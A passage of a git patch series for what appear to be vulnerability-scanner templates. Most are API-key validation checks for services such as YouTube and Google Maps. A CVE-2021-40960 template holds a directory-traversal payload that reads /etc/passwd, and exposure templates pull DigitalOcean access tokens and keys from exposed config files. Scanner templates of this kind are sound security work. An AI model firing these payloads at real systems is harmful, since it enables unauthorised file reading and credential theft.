+1,26 @@ +id: api-weglot + +info: + name: WeGlot API Test + author: zzeitlin + reference: https://developers.weglot.com/api/reference + severity: info + tags: api,weglot + +requests: + - method: POST + payloads: + token: token.txt + path: + - "https://api.weglot.com/translate?api_key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Content-Type: application/json + body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" + matchers: + - type: word + part: body + negative: true + words: + - 'does not exist' diff --git a/apis/youtube.yaml b/apis/youtube.yaml new file mode 100644 index 0000000000..66713ee278 --- /dev/null +++ b/apis/youtube.yaml @@ -0,0 +1,27 @@ +id: api-youtube + +info: + name: YouTube API Test + author: zzeitlin + reference: https://developers.google.com/youtube/v3/docs + severity: info + tags: api,youtube + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'quotaExceeded' + - type: status + status: + - 200 From 3af984c55d35f9fd59256db44cbf2a346ea323d3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 1 Oct 2021 21:52:29 +0700 Subject: [PATCH 2683/4083] Create CVE-2021-40960.yaml --- cves/2021/CVE-2021-40960.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-40960.yaml diff --git a/cves/2021/CVE-2021-40960.yaml b/cves/2021/CVE-2021-40960.yaml new file mode 100644 index 0000000000..126dd45651 --- /dev/null +++ b/cves/2021/CVE-2021-40960.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-40960 + +info: + name: Galera WebTemplate 1.0 – Directory Traversal + author: daffainfo + severity: high + description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. + reference: + - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960 + tags: cve,cve2021,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From d188c71e975771107913def084c2dddec6ce6d45 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 1 Oct 2021 21:01:12 +0530 Subject: [PATCH 2684/4083] error fixes --- apis/googledirections.yaml | 3 +-- apis/npm.yaml | 6 ++++-- apis/pendo.yaml | 3 +-- apis/twitter.yaml | 2 +- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/apis/googledirections.yaml b/apis/googledirections.yaml index fbc7a2be93..bafca31ab4 100644 --- a/apis/googledirections.yaml +++ b/apis/googledirections.yaml @@ -20,5 +20,4 @@ requests: part: body words: - 'error_message' - negative: true - + negative: true \ No newline at end of file diff --git a/apis/npm.yaml b/apis/npm.yaml index f9637b9c5d..24796b2f09 100644 --- a/apis/npm.yaml +++ b/apis/npm.yaml @@ -9,17 +9,19 @@ info: requests: - method: GET + payloads: token: token.txt + path: - "https://registry.npmjs.org/-/whoami" - redirects: false headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Bearer {{token}} + matchers: - type: status - status: + status: - 401 - 403 negative: true diff --git a/apis/pendo.yaml b/apis/pendo.yaml index 7bea14f9a6..a5383d35f8 100644 --- a/apis/pendo.yaml +++ b/apis/pendo.yaml @@ -23,5 +23,4 @@ requests: - type: status status: - 403 - negative: true - + negative: true \ No newline at end of file diff --git a/apis/twitter.yaml b/apis/twitter.yaml index 093ada5a49..eaac88b705 100644 --- a/apis/twitter.yaml +++ b/apis/twitter.yaml @@ -3,7 +3,7 @@ id: api-twitter info: name: Twitter API Test author: zzeitlin - refernce: https://developer.twitter.com/en/docs/twitter-api/api-reference-index + reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index severity: info tags: api,twitter From c05df76ed27ef2ce0607d9f571f6aaedc44509e8 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 1 Oct 2021 13:13:35 -0500 Subject: [PATCH 2685/4083] Create tugboat-config-exposure.yaml Create tugboat-config-exposure.yaml --- .../digitalocean/tugboat-config-exposure.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposures/tokens/digitalocean/tugboat-config-exposure.yaml diff --git a/exposures/tokens/digitalocean/tugboat-config-exposure.yaml b/exposures/tokens/digitalocean/tugboat-config-exposure.yaml new file mode 100644 index 0000000000..071edb2716 --- /dev/null +++ b/exposures/tokens/digitalocean/tugboat-config-exposure.yaml @@ -0,0 +1,33 @@ +id: tugboat-config-exposure + +info: + name: Tugboat configuration file exposure + description: Tugboat is a command line tool for interacting with your DigitalOcean droplets. + reference: https://github.com/petems/tugboat + author: geeknik + severity: critical + tags: tugboat,config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.tugboat" + + matchers: + + - type: status + status: + - 200 + + - type: word + words: + - "authentication" + - "access_token" + - "ssh_user" + condition: and + + extractors: + - type: regex + part: body + regex: + - 'access_token: .*' From ec88d62ad47ec39f1728ee8f9ec22ba9f92980a4 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 1 Oct 2021 13:20:23 -0500 Subject: [PATCH 2686/4083] Create axiom-digitalocean-key-exposure.yaml create axiom-digitalocean-key-exposure.yaml --- .../axiom-digitalocean-key-exposure.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml diff --git a/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml b/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml new file mode 100644 index 0000000000..165e744d6c --- /dev/null +++ b/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml @@ -0,0 +1,31 @@ +id: axiom-digitalocean-key-exposure + +info: + name: DigitalOcean key exposure via Axiom + description: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments, build and deploy repeatable infrastructure focussed on offensive and defensive security. + reference: https://github.com/pry0cc/axiom + author: geeknik + severity: critical + tags: axiom,digitalocean,key,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.axiom/accounts/do.json" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "do_key" + - "region" + - "imageid" + condition: and + extractors: + - type: regex + part: body + regex: + - '\"do_key\"\: .*' From bdbf73cd34c37336deeeb385b6c95ce236c4ee65 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 1 Oct 2021 13:21:58 -0500 Subject: [PATCH 2687/4083] Update tugboat-config-exposure.yaml --- exposures/tokens/digitalocean/tugboat-config-exposure.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/tokens/digitalocean/tugboat-config-exposure.yaml b/exposures/tokens/digitalocean/tugboat-config-exposure.yaml index 071edb2716..e5ca51b07c 100644 --- a/exposures/tokens/digitalocean/tugboat-config-exposure.yaml +++ b/exposures/tokens/digitalocean/tugboat-config-exposure.yaml @@ -15,9 +15,9 @@ requests: matchers: - - type: status - status: - - 200 + - type: status + status: + - 200 - type: word words: From 2327224260b5bbc3c9a35d554e63b197eacd1349 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 1 Oct 2021 13:22:35 -0500 Subject: [PATCH 2688/4083] Update axiom-digitalocean-key-exposure.yaml --- .../digitalocean/axiom-digitalocean-key-exposure.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml b/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml index 165e744d6c..01297d796c 100644 --- a/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml +++ b/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml @@ -15,9 +15,9 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 + - type: status + status: + - 200 - type: word words: - "do_key" From 2b477061e8cdfbf550acc9610edaef4b278af331 Mon Sep 17 00:00:00 2001 From: Jackson Rolf Date: Fri, 1 Oct 2021 15:30:31 -0400 Subject: [PATCH 2689/4083] Added CVE-2018-0127 template. --- cves/2018/CVE-2018-0127.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2018/CVE-2018-0127.yaml diff --git a/cves/2018/CVE-2018-0127.yaml b/cves/2018/CVE-2018-0127.yaml new file mode 100644 index 0000000000..ab31e8d430 --- /dev/null +++ b/cves/2018/CVE-2018-0127.yaml @@ -0,0 +1,26 @@ +id: CVE-2018-0127 +info: + name: Cisco RV132W and RV134W Wireless VPN Routers Unauthenticated Information Disclosure Vulnerability + author: jrolf + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 + description: Detects Cisco devices vulnerable to CVE-2018-0127 + tags: cve,cve2018,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/dumpmdm.cmd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Dump" + - "MDM" + - "cisco" + - "admin" + part: body From 7dbe738f42bc830c88c8cc70cd8b811794ec14ee Mon Sep 17 00:00:00 2001 From: "zzeitlin@bishopfox.com" <58756038+zzeitlin@users.noreply.github.com> Date: Fri, 1 Oct 2021 19:34:14 +0000 Subject: [PATCH 2690/4083] Apply PR recommendations --- apis/asana.yaml | 4 ---- apis/bingmaps.yaml | 4 ---- apis/bitly.yaml | 4 ---- apis/buildkite.yaml | 4 ---- apis/buttercms.yaml | 4 ---- apis/calendly.yaml | 4 ---- apis/circleci.yaml | 4 ---- apis/deviantart.yaml | 4 ---- apis/dropbox.yaml | 4 ---- apis/github.yaml | 4 ---- apis/googleautocomplete.yaml | 4 ---- apis/googlecustomsearch.yaml | 4 ---- apis/googledirections.yaml | 4 ---- apis/googleelevation.yaml | 4 ---- apis/googlefcm.yaml | 4 ---- apis/googlefindplacefromtext.yaml | 4 ---- apis/googlegedistancematrix.yaml | 4 ---- apis/googlegeocode.yaml | 4 ---- apis/googlegeolocation.yaml | 4 ---- apis/googlemapsembed.yaml | 4 ---- apis/googlemapsembedadvanced.yaml | 4 ---- apis/googlenearbysearch.yaml | 4 ---- apis/googlenearestroads.yaml | 4 ---- apis/googleplacedetails.yaml | 4 ---- apis/googleplacesphoto.yaml | 4 ---- apis/googleplayablelocations.yaml | 4 ---- apis/googleroutetotraveled.yaml | 4 ---- apis/googlespeedlimit.yaml | 4 ---- apis/googlestaticmaps.yaml | 4 ---- apis/googlestreetview.yaml | 4 ---- apis/googletextsearchplaces.yaml | 4 ---- apis/googletimezone.yaml | 4 ---- apis/heroku.yaml | 4 ---- apis/hubspot.yaml | 4 ---- apis/instagram.yaml | 4 ---- apis/ipstack.yaml | 4 ---- apis/iterable.yaml | 4 ---- apis/jumpcloud.yaml | 4 ---- apis/lokalise.yaml | 4 ---- apis/loqate.yaml | 4 ---- apis/mailchimp.yaml | 2 -- apis/mailgun.yaml | 4 ---- apis/mapbox.yaml | 4 ---- apis/nerdgraph.yaml | 4 ---- apis/npm.yaml | 3 --- apis/openweather.yaml | 4 ---- apis/pagerduty.yaml | 4 ---- apis/pendo.yaml | 4 ---- apis/pivotaltracker.yaml | 4 ---- apis/postmark.yaml | 4 ---- apis/sendgrid.yaml | 2 -- apis/slack.yaml | 4 ---- apis/sonarcloud.yaml | 4 ---- apis/spotify.yaml | 4 ---- apis/square.yaml | 4 ---- apis/stripe.yaml | 4 ---- apis/tinypng.yaml | 4 ---- apis/token.txt | 1 - apis/travisci.yaml | 4 ---- apis/twitter.yaml | 4 ---- apis/visualstudio.yaml | 4 ---- apis/wakatime.yaml | 4 ---- apis/weglot.yaml | 4 ---- apis/youtube.yaml | 4 ---- 64 files changed, 248 deletions(-) delete mode 100644 apis/token.txt diff --git a/apis/asana.yaml b/apis/asana.yaml index 583f02e5a4..50b6ca587f 100644 --- a/apis/asana.yaml +++ b/apis/asana.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://app.asana.com/api/1.0/users/me" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Bearer {{token}} matchers: - type: status diff --git a/apis/bingmaps.yaml b/apis/bingmaps.yaml index 05bc705c0e..fddae385db 100644 --- a/apis/bingmaps.yaml +++ b/apis/bingmaps.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/bitly.yaml b/apis/bitly.yaml index 4601ed1361..5551d02fee 100644 --- a/apis/bitly.yaml +++ b/apis/bitly.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/buildkite.yaml b/apis/buildkite.yaml index fd1466746b..b482af9a04 100644 --- a/apis/buildkite.yaml +++ b/apis/buildkite.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.buildkite.com/v2/user" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Bearer {{token}} matchers: - type: status diff --git a/apis/buttercms.yaml b/apis/buttercms.yaml index 62178ec48b..d412bf8581 100644 --- a/apis/buttercms.yaml +++ b/apis/buttercms.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/calendly.yaml b/apis/calendly.yaml index 23936895ff..f2725c0456 100644 --- a/apis/calendly.yaml +++ b/apis/calendly.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://calendly.com/api/v1/users/me" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 X-Token: "{{token}}" matchers: - type: status diff --git a/apis/circleci.yaml b/apis/circleci.yaml index 4ffe4d2771..3ec7629cd6 100644 --- a/apis/circleci.yaml +++ b/apis/circleci.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/deviantart.yaml b/apis/deviantart.yaml index 20a7ff91c8..304bd8ce69 100644 --- a/apis/deviantart.yaml +++ b/apis/deviantart.yaml @@ -9,13 +9,9 @@ info: requests: - method: POST - payloads: - token: token.txt path: - "https://www.deviantart.com/api/v1/oauth2/placebo" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 body: "access_token={{token}}" matchers: - type: word diff --git a/apis/dropbox.yaml b/apis/dropbox.yaml index 900f2d5c15..0d0e862dce 100644 --- a/apis/dropbox.yaml +++ b/apis/dropbox.yaml @@ -9,13 +9,9 @@ info: requests: - method: POST - payloads: - token: token.txt path: - "https://api.dropboxapi.com/2/users/get_current_account" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Bearer {{token}} matchers: - type: status diff --git a/apis/github.yaml b/apis/github.yaml index ba3a7788c1..a08cc0832b 100644 --- a/apis/github.yaml +++ b/apis/github.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.github.com/user" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Basic {{base64('user:' + token)}} matchers: - type: word diff --git a/apis/googleautocomplete.yaml b/apis/googleautocomplete.yaml index e38ceb76b8..89218f3616 100644 --- a/apis/googleautocomplete.yaml +++ b/apis/googleautocomplete.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googlecustomsearch.yaml b/apis/googlecustomsearch.yaml index d5f8d9477f..a3bcfe55d3 100644 --- a/apis/googlecustomsearch.yaml +++ b/apis/googlecustomsearch.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://www.googleapis.com/customsearch/v1?cx=017576662512468239146:omuauf_lfve&q=lectures&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googledirections.yaml b/apis/googledirections.yaml index bafca31ab4..91478e6728 100644 --- a/apis/googledirections.yaml +++ b/apis/googledirections.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googleelevation.yaml b/apis/googleelevation.yaml index 3dc50b59bc..a8c685513d 100644 --- a/apis/googleelevation.yaml +++ b/apis/googleelevation.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googlefcm.yaml b/apis/googlefcm.yaml index 301f625869..d5c62731fc 100644 --- a/apis/googlefcm.yaml +++ b/apis/googlefcm.yaml @@ -8,14 +8,10 @@ info: requests: - method: POST - payloads: - token: token.txt path: - "https://fcm.googleapis.com/fcm/send" - redirects: false body: "{'registration_ids':['ABC']}" headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: key={{token}} Content-Type: application/json matchers: diff --git a/apis/googlefindplacefromtext.yaml b/apis/googlefindplacefromtext.yaml index f502ca9de8..26c368fe82 100644 --- a/apis/googlefindplacefromtext.yaml +++ b/apis/googlefindplacefromtext.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googlegedistancematrix.yaml b/apis/googlegedistancematrix.yaml index 8fb55af126..3c8e8c0f1c 100644 --- a/apis/googlegedistancematrix.yaml +++ b/apis/googlegedistancematrix.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googlegeocode.yaml b/apis/googlegeocode.yaml index 3630805098..29c641a3fc 100644 --- a/apis/googlegeocode.yaml +++ b/apis/googlegeocode.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googlegeolocation.yaml b/apis/googlegeolocation.yaml index d314654658..548eeb0d5f 100644 --- a/apis/googlegeolocation.yaml +++ b/apis/googlegeolocation.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers-condition: and matchers: - type: word diff --git a/apis/googlemapsembed.yaml b/apis/googlemapsembed.yaml index 874c52c7b5..1b6143073f 100644 --- a/apis/googlemapsembed.yaml +++ b/apis/googlemapsembed.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/googlemapsembedadvanced.yaml b/apis/googlemapsembedadvanced.yaml index 68247530a1..ebd7e16135 100644 --- a/apis/googlemapsembedadvanced.yaml +++ b/apis/googlemapsembedadvanced.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/googlenearbysearch.yaml b/apis/googlenearbysearch.yaml index 3d4ce04ff3..c26bada610 100644 --- a/apis/googlenearbysearch.yaml +++ b/apis/googlenearbysearch.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googlenearestroads.yaml b/apis/googlenearestroads.yaml index aed30d37b7..f6916116f1 100644 --- a/apis/googlenearestroads.yaml +++ b/apis/googlenearestroads.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googleplacedetails.yaml b/apis/googleplacedetails.yaml index 2cc17c9d83..781058d508 100644 --- a/apis/googleplacedetails.yaml +++ b/apis/googleplacedetails.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googleplacesphoto.yaml b/apis/googleplacesphoto.yaml index fb18b2eb74..9d9271864c 100644 --- a/apis/googleplacesphoto.yaml +++ b/apis/googleplacesphoto.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/googleplayablelocations.yaml b/apis/googleplayablelocations.yaml index 0cbb4b74cd..068ef45d58 100644 --- a/apis/googleplayablelocations.yaml +++ b/apis/googleplayablelocations.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googleroutetotraveled.yaml b/apis/googleroutetotraveled.yaml index 26b36b1d14..e6a943ac1d 100644 --- a/apis/googleroutetotraveled.yaml +++ b/apis/googleroutetotraveled.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://roads.googleapis.com/v1/snapToRoads?path=-35.27801,149.12958|-35.28032,149.12907&interpolate=true&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googlespeedlimit.yaml b/apis/googlespeedlimit.yaml index baef0d8cc7..785d09e3f0 100644 --- a/apis/googlespeedlimit.yaml +++ b/apis/googlespeedlimit.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googlestaticmaps.yaml b/apis/googlestaticmaps.yaml index bf16e79c38..35585fd3f2 100644 --- a/apis/googlestaticmaps.yaml +++ b/apis/googlestaticmaps.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/googlestreetview.yaml 